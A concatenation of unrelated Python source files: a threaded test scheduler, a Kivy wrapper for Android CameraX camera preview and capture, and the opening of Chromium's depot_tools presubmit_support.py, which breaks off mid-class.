self.default_buffer.document = Document()
except BaseException as e:
exception = e
return
finally:
if self.insert_blank_line_after_input:
self.app.output.write("\n")
thread = threading.Thread(target=in_thread)
thread.start()
thread.join()
if exception is not None:
raise exception
return result
|
schedule.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: leeyoshinari
import queue
from threading import Thread
from testing import Testing
class Scheduler(object):
def __init__(self):
self.testing = Testing()
self.test_task = queue.Queue() # 创建队列
t = Thread(target=self.worker)
t.start()
@property
def task(self):
return None
@task.setter
def task(self, value):
self.test_task.put((self.testing.run, value))
def worker(self):
"""
从队列中获取测试任务,并开始执行
:return:
"""
while True:
func, param = self.test_task.get()
func(param)
self.test_task.task_done()
|
preview_camerax.py | # An implementation of Android CameraX called from a Kivy Preview widget.
#
# About CameraX:
# https://developer.android.com/training/camerax
# Tested devices:
# https://developer.android.com/training/camerax/devices
#
# Source
# https://github.com/Android-for-Python/Camera4Kivy/preview_camerax.py
#
from kivy.clock import Clock, mainthread
from kivy.graphics import Fbo, Callback, Rectangle, Rotate, Scale, Translate,\
Color
from kivy.graphics.texture import Texture
from datetime import datetime
from os.path import exists, join
from os import mkdir, remove
from pathlib import Path
from threading import Thread
from gestures4kivy import CommonGestures
from camera4kivy.preview_common import PreviewCommon
from android.storage import app_storage_path, primary_external_storage_path
from android.runnable import run_on_ui_thread
from android import mActivity, api_version
from jnius import autoclass, PythonJavaClass, java_method
GL_TEXTURE_EXTERNAL_OES = autoclass(
'android.opengl.GLES11Ext').GL_TEXTURE_EXTERNAL_OES
Environment = autoclass('android.os.Environment')
CameraX = autoclass('org.kivy.camerax.CameraX')
if api_version >= 29:
ContentValues = autoclass('android.content.ContentValues')
MediaStoreMediaColumns =\
autoclass('android.provider.MediaStore$MediaColumns')
MediaStoreImagesMedia =\
autoclass('android.provider.MediaStore$Images$Media')
FileInputStream = autoclass('java.io.FileInputStream')
FileUtils = autoclass('android.os.FileUtils')
class PreviewCameraX(PreviewCommon, CommonGestures):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._camera = None
self.enable_zoom_gesture = False
self.enable_focus_gesture = False
##############################
# Lifecycle events
##############################
def connect_camera(self,
enable_photo = True,
enable_video = True,
enable_analyze_imageproxy = False,
camera_id = 'back',
optimize = 'quality',
sensor_resolution = None,
default_flash = 'off',
default_zoom = 0.5,
enable_zoom_gesture = True,
enable_focus_gesture = True,
data_format = 'yuv420',
filepath_callback = None,
analyze_proxy_callback = None,
analyze_callback = None,
canvas_callback = None,
**kwargs):
self._camera = None
self._update_ev = None
self._name_pipe = []
self.texture_size = []
self.rotation = 0
self.capture_in_progress = False
# uniform case
self.flash_state = default_flash.lower()
data_format = data_format.lower()
optimize = optimize.lower()
self.canvas_callback = canvas_callback
self.set_filepath_callback(filepath_callback)
self.set_facing(camera_id)
self.set_resolution(sensor_resolution)
self.enable_data = enable_analyze_imageproxy
# flash
if self.flash_state not in ['on','off','auto']:
self.flash_state = 'off'
# optimize
if optimize not in ['latency','quality']:
optimize = 'quality'
# zoom and focus
default_zoom = min(max(default_zoom,0),1)
self.enable_zoom_gesture = enable_zoom_gesture
self.enable_focus_gesture = enable_focus_gesture
# Analyse Image format
if data_format not in ['rgba', 'yuv420']:
data_format = 'yuv420'
self._analyze_callback = analyze_callback
self._analyze_proxy_callback = analyze_proxy_callback
# These Java callbacks will execute in Java Main Thread
self.cb_wrapper = CallbackWrapper(self._filename_callback,
self._analyze_image_proxy,
self._configure_pipeline)
# Create an Android camera with the required behavior
self._camera = CameraX(
enable_photo,
enable_video,
self.enable_data,
self.facing,
self._sensor_resolution,
self.aspect_ratio,
self.cb_wrapper,
self.flash_state,
optimize,
default_zoom,
data_format)
# Configure the camera for the Kivy view port
self._configure_camera(True)
# destroy camera
@run_on_ui_thread
def disconnect_camera(self):
self.stop_capture_video()
self._deschedule_pipeline()
if self._camera:
self._camera.unbind_camera()
self._camera = None
# configure camera
def _configure_camera(self, start):
self.configure_viewport()
if self._camera:
self._camera.setViewPort(self.view_size)
self._camera.startCamera()
else:
self.canvas.clear()
with self.canvas:
Color(1,1,1,1)
Rectangle(size = self.view_size, pos = self.view_pos)
# Device Rotate
def on_size(self, instance, size):
if self._camera:
self.stop_capture_video()
self._configure_camera(False)
##################################
# Parse options
##################################
def set_facing(self, facing):
facing = facing.lower()
if facing == '0':
facing = 'back'
elif facing == '1':
facing = 'front'
elif facing not in ['back','front']:
facing = 'back'
self.facing = facing
##############################
# Preview Widget Touch Events
##############################
# CommonGestures Touch Events
# tap for focus
def cg_tap(self, touch, x, y):
if self._camera and self.enable_focus_gesture:
self.focus(x, y)
# pinch/spread for zoom
def cg_scale(self, touch0, touch1, scale, x, y):
if self._camera and self.enable_zoom_gesture:
self.zoom_delta(scale)
##############################
# User events
##############################
def capture_photo(self, location = '', subdir = '', name = ''):
if self._camera:
self.capture_in_progress = True
self._set_location(location)
subdir = self._default_subdir_android(subdir)
name = self._default_file_name(name, '.jpg')
if self.file_storage:
self._name_pipe.append(join(subdir, name))
self._camera.capture_photo(subdir, name, self.file_storage)
def capture_video(self, location = '', subdir = '', name = ''):
if self._camera:
self.capture_in_progress = True
self._set_location(location)
subdir = self._default_subdir_android(subdir)
name = self._default_file_name(name,'.mp4')
if self.file_storage:
self._name_pipe.append(join(subdir, name))
self._camera.capture_video(subdir, name, self.file_storage)
def stop_capture_video(self):
if self._camera:
self._camera.stop_capture_video()
def capture_screenshot(self, location = '.', subdir = '', name = ''):
view_crop = self.screenshot_crop()
self._set_location(location)
subdir = self._default_subdir_android(subdir)
name = self._default_file_name(name, '.jpg')
tex = self.export_as_image().texture.get_region(*view_crop)
path = join(subdir, name)
if self.file_storage:
# local or, shared and api<=29
tex.save(path, flipped = True)
if self.callback:
self.callback(path)
else:
# MediaStore
cache = self.cache_path()
if cache:
# write to cache
cachefile = join(cache, name)
tex.save(cachefile, flipped = True)
# create MediaStore entry
cv = ContentValues()
cv.put(MediaStoreMediaColumns.DISPLAY_NAME, name)
cv.put(MediaStoreMediaColumns.MIME_TYPE, 'image/jpeg')
cv.put(MediaStoreMediaColumns.RELATIVE_PATH, subdir)
root_uri = MediaStoreImagesMedia.getContentUri('external')
context = mActivity.getApplicationContext()
uri = context.getContentResolver().insert(root_uri, cv)
# copy cache file to MediaStore
rs = FileInputStream(cachefile)
ws = context.getContentResolver().openOutputStream(uri)
FileUtils.copy(rs,ws)
ws.flush()
ws.close()
rs.close()
remove(cachefile)
if self.callback:
self.callback(path)
# Select back, front camera
def select_camera(self, facing):
if self._camera:
facing = facing.lower()
if facing == 'toggle':
if self.facing == 'back':
self.facing = 'front'
else:
self.facing = 'back'
elif facing == 'front' or facing == '1':
self.facing = 'front'
else:
self.facing = 'back'
# may have to wait for a capture to complete
if not self.capture_in_progress:
self.do_select_camera()
else:
self.stop_capture_video()
self._facing_ev = Clock.schedule_interval(
self.can_select_camera, 1 / 30)
facing = self.facing
return facing
def can_select_camera(self,dt):
if not self.capture_in_progress:
self.do_select_camera()
Clock.unschedule(self._facing_ev)
@run_on_ui_thread
def do_select_camera(self):
self._camera.select_camera(self.facing)
# Sequence flash : off, on, auto, ...
def flash(self):
if self._camera:
if self.flash_state == 'off':
self.flash_state = 'on'
elif self.flash_state == 'on':
self.flash_state = 'auto'
else:
self.flash_state = 'off'
self.flash_state = self._camera.flash(self.flash_state)
return self.flash_state
return "off"
# if enable_focus_gesture == True, then this is called by a tap gesture
def focus(self, x, y):
if self._camera:
self._camera.focus(x, y)
# if enable_zoom_gesture == True, then this called by pinch/spread gesture
def zoom_delta(self, delta_scale):
if self._camera:
self._camera.zoom(delta_scale, False)
def zoom_abs(self, scale):
if self._camera:
self._camera.zoom(scale, True)
##############################
# Create Preview Pipeline
##############################
def _create_texture(self, size):
self._camera_texture = Texture(width = size[0],
height= size[1],
target=GL_TEXTURE_EXTERNAL_OES,
colorfmt='rgba')
return int(self._camera_texture.id)
def _create_fbo(self, texture_size, rotation):
long_edge = max(texture_size)
short_edge = min(texture_size)
origin = (texture_size[0]/2, texture_size[1]/2)
translate = 0
scalex = 1
scaley = 1
if rotation == 90:
translate = -(long_edge - short_edge) /2
elif rotation == 270:
translate = (long_edge - short_edge) /2
if texture_size[0] < texture_size[1]:
translate = -translate
scalex = -scalex
scaley = -scaley
if rotation in [90 , 270]:
fbo_size = (texture_size[1],texture_size[0])
else:
fbo_size = texture_size
self._fbo = Fbo(size=fbo_size)
self._fbo.shader.fs = '''
#extension GL_OES_EGL_image_external : require
$HEADER$
uniform samplerExternalOES texture1;
void main()
{
gl_FragColor = texture2D(texture1, tex_coord0);
}
'''
with self._fbo.before:
Rotate(origin = origin, angle = 360 - rotation, axis = (0, 0, 1))
Translate(translate, translate)
Scale(scalex, scaley, 1, origin = origin )
Rectangle(size = texture_size)
with self._fbo:
self._camera_texture_cb = Callback(lambda instr:
self._camera_texture.bind)
# Run on Kivy main thread because required by FBO.
@mainthread
def _create_pipeline(self, texture_size, rotation):
id = self._create_texture(texture_size)
self._create_fbo(texture_size, rotation)
self._camera.setTexture(id,texture_size)
self._schedule_pipeline()
##############################
# Fill Preview Pipeline
##############################
def _schedule_pipeline(self):
self._deschedule_pipeline()
if self._camera and self._camera_texture and self._fbo.texture:
self._set_surface_provider(True)
Thread(target=self._pipeline_thread,daemon=True).start()
def _deschedule_pipeline(self):
if self._update_ev is not None:
self._set_surface_provider(False)
self._update_ev.cancel()
self._update_ev = None
def _pipeline_thread(self):
fps = 30
self._update_ev = Clock.schedule_interval(self._update_pipeline,
1 / fps)
def _update_pipeline(self, dt):
if self._camera.imageReady():
self._camera_texture_cb.ask_update()
self._fbo.draw()
self._analyze_texture()
self._update_canvas()
# Run on UI thread because required by CameraX
@run_on_ui_thread
def _set_surface_provider(self, enable):
self._camera.setSurfaceProvider(enable)
# Run on mainthread because required by Kivy canvas
@mainthread
def _update_canvas(self):
tex = self._fbo.texture.get_region(*self.crop)
# moved from create_fbo
if self.facing == 'front':
view_size = (-self.view_size[0], self.view_size[1])
view_pos = (self.view_pos[0] + self.view_size[0],
self.view_pos[1])
else:
view_size = self.view_size
view_pos = self.view_pos
self.canvas.clear()
with self.canvas:
Color(1,1,1,1)
Rectangle(texture= tex, size = view_size, pos = view_pos)
if self.canvas_callback:
self.canvas_callback(tex, view_size, view_pos)
#######################################
# Storage Location
#######################################
def _set_location(self, location):
storage = location.lower()
if storage not in ['private', 'shared']:
storage = 'shared'
self.private_storage = storage == 'private'
self.file_storage = self.private_storage or api_version < 29
def _default_location(self):
if self.private_storage:
root = join(app_storage_path(),Environment.DIRECTORY_DCIM)
if not exists(root):
mkdir(root)
else:
if api_version < 29:
root = join(primary_external_storage_path(),
Environment.DIRECTORY_DCIM,
self._app_name())
if not exists(root):
mkdir(root)
else:
root = join(Environment.DIRECTORY_DCIM, self._app_name())
return root
def _default_subdir_android(self, subdir=''):
root = self._default_location()
if not subdir:
# Today's date
subdir = datetime.now().strftime("%Y_%m_%d")
path = join(root,subdir)
if self.private_storage or api_version < 29:
if not exists(path):
mkdir(path)
return path
def _app_name(self):
context = mActivity.getApplicationContext()
appinfo = context.getApplicationInfo()
if appinfo.labelRes:
name = context.getString(appinfo.labelRes)
else:
name = appinfo.nonLocalizedLabel.toString()
return name
def cache_path(self):
context = mActivity.getApplicationContext()
cache = context.getExternalCacheDir()
return str(cache.toString())
#######################################
# Callbacks
#######################################
# Runs in Java Main Thread
def _configure_pipeline(self, croprect, resolution, rotation):
if rotation in [ 90, 270]:
self.crop = [croprect.top, croprect.left,
croprect.bottom - croprect.top,
croprect.right - croprect.left]
else:
self.crop = [croprect.left, croprect.top,
croprect.right - croprect.left,
croprect.bottom - croprect.top]
texture_size = [resolution.getWidth(), resolution.getHeight()]
self.texture_size = texture_size
self.tscale = self.view_size[1] / self.crop[3]
self.rotation = rotation
self._create_pipeline(texture_size, rotation)
# Runs in some Java thread
def _filename_callback(self, file_id):
if not file_id:
# The callback returns "" for non-MediaStore saves
if self._name_pipe:
file_id = self._name_pipe[0]
self._name_pipe = self._name_pipe[1:]
self.capture_in_progress = False
if self.callback:
self.callback(str(file_id))
def _analyze_texture(self):
if not self.enable_data and self._analyze_callback:
tex = self._fbo.texture.get_region(*self.crop)
self._analyze_callback(tex, self.view_pos,
self.tscale, self.facing=='front')
def _analyze_image_proxy(self, image_proxy):
if self.enable_data and self._analyze_proxy_callback:
if self.rotation in [0, 180]:
tscale = self.view_size[1] / image_proxy.getHeight()
else:
tscale = self.view_size[1] / image_proxy.getWidth()
self._analyze_proxy_callback(image_proxy, self.view_pos,
tscale, self.facing == 'front',
self.rotation)
class CallbackWrapper(PythonJavaClass):
__javacontext__ = 'app'
__javainterfaces__ = ['org/kivy/camerax/CallbackWrapper']
def __init__(self, callback0, callback1, callback2):
super().__init__()
self.callback0 = callback0
self.callback1 = callback1
self.callback2 = callback2
@java_method('(Ljava/lang/String;)V')
def callback_string(self, filepath):
if self.callback0:
self.callback0(filepath)
@java_method('(Landroidx/camera/core/ImageProxy;)V')
def callback_image(self, image):
if self.callback1:
self.callback1(image)
@java_method('(Landroid/graphics/Rect;Landroid/util/Size;I)V')
def callback_config(self, croprect, resolution, rotation):
if self.callback2:
self.callback2(croprect, resolution, rotation)
|
presubmit_support.py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
# On Windows, scripts on the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
try:
start = time_time()
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(self._long_text)
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_WHITE_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_WHITE_LIST.setter
def DEFAULT_WHITE_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_ALLOW_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_ALLOW_LIST.setter
def DEFAULT_ALLOW_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLACK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLACK_LIST.setter
def DEFAULT_BLACK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLOCK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLOCK_LIST.setter
def DEFAULT_BLOCK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
